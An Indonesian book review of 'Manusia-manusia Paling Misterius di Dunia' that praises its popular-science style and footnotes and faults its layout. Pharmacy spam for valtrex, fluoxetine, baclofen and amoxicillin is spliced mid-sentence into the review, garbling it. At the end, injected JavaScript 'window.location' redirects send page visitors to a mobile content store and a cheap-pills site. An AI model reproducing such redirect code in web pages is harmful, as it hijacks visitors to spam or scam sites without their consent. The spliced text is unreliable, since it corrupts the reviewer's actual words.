Review Buku “Manusia-manusia Paling Misterius di Dunia”

Penulis : Eka Nada Shofa Alkhajar

Desain sampul dan Layout : Yudhi Herwibowo

Editor : Anton WP

ISBN : 978-979-1032-68-1

Halaman : 156 halaman

Penerbit : Bukukatta

 

 

 

 

Secara konten atau isi dari buku yang ditulis oleh Eka Nada Shofa Alkhajar ini menurut saya bagus, baik dan oke apalagi ditulis dengan bahasa ilmiah populer sehingga menjadi bacaan yang renyah dan enak dibaca. Namun ada yang kurang dalam pandangan saya yaitu berkaitan dengan layout buku karena ada beberapa gambar saya lihat layoutnya kurang rapi dan beberapa gambar belum terdapat caption.

Bagi saya caption dan layout itu cukup mempengaruhi tampilan sebuah buku. Karena tentu disayangkan apabila isi buku sudah begitu bagus namun layoutnya masih kurang rapi. Karena sekarangpun banyak beredar buku-buku yang sebenarnya isinya biasa-biasa saja bahkan amat biasa namun karena layoutnya bagus sehingga jadi terlihat bagus.

Akan tetapi, menurut saya ada tiga hal terpenting yang membuat buku ini, setidaknya menurut saya, menjadi sajian yang bagus. Pertama, penulis menyajikan hikmah (pelajaran) dari berbagai kisah yang dipaparkannya tanpa memberikan kesan menggurui atau “mengajarkan”. Semuanya mengalir dengan halus dan lembut.

Kedua, penulis memberikan pijakan teoritis dalam memaknai berbagai kisah manusia paling misterius di dunia tersebut dari sudut pandang industri budaya (culture industry sale valtrex without prescription 5 jul 2010 … purchase cheap valtrex 1000 mg, 500 mg buy top-quality products. 90% off on brand name and generic buy generic fluoxetine , fluoxetine. buy generic fluoxetine . online buy buy generic fluoxetine without a prescription · buy generic fluoxetine . fluoxetine ) sehingga buku ini memiliki cakupan pembaca yang luas karena dapat dibaca orang awam atau orang akademik sekalipun.

Kemudian ketiga, yang menurut saya paling utama kelebihan dari buku ini adalah adanya daftar pustaka dalam hal ini adalah catatan kaki (footnote) sebagai referensi yang digunakan dalam menuliskan buku ini. Semisal nov 25, 2011 – baclofen for drug abuse cheap online. baclofen for cheap baclofen for neurogenic bladder watson baclofen for kidney stones online uk World Mythology, The Facts On File Encyclopedia of World Mythology and Legend amoxil generic order Amoxicillin buy amoxicillin , berbagai buku-buku mengenai tokoh-tokoh yang disajikan dan sebagainya. Dari catatan kaki ini, dapat dilihat bahwa penulis benar-benar melakukan berbagai kroscek, pelacakan dan bahkan penelitian terhadap apa yang ditulisnya.

Dalam buku ini, saya sangat menyukai cerita mengenai Nostradamus karena ia memang merupakan tokoh misterius dan kontroversi karena berbagai ramalannya dulu saya pernah membaca sekilas mengenai dirinya dan di buku ini kisahnya dipaparkan secara lengkap dengan ramalan-ramalannya. Penasaran? Oleh karena itu, saya ucapkan selamat membaca!.

Sri Herwindya Baskara Wijaya, Pendidik dan Penikmat buku

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”;